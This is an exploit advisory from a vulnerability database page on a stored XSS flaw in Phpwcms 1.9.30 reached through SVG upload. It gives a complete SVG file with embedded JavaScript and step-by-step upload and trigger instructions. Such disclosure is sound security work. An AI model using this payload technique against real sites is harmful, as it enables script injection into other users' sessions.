Phpwcms 1.9.30 - File Upload to XSS

2021.10.02
ir Ali Seddigh (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|=========================================================================== | # Exploit Title : Phpwcms 1.9.30 - File Upload to XSS | | # Author : Ali Seddigh | | # Category : Web Application | | # Software Link: http://www.phpwcms.org | | # Tested on : [Windows 10 ,Kali Linux ] | | # Version : 1.9.30 | | # Date : 2021-10-30 |=========================================================================== Steps: 1-) You need to login to the system. http://target.com/phpwcms/login.php 2-) Creating payload with SVG extension: payload.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS!"); </script> </svg> 3-) Go to the following link and upload the payload: http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8 From the menu: file -> multiple file upload -> Select files or drop here 4-) After uploading payload, call it from the link below. http://192.168.1.112/phpwcms/upload/ |=========================================================================== | # Discovered By : Ali Triplex |===========================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top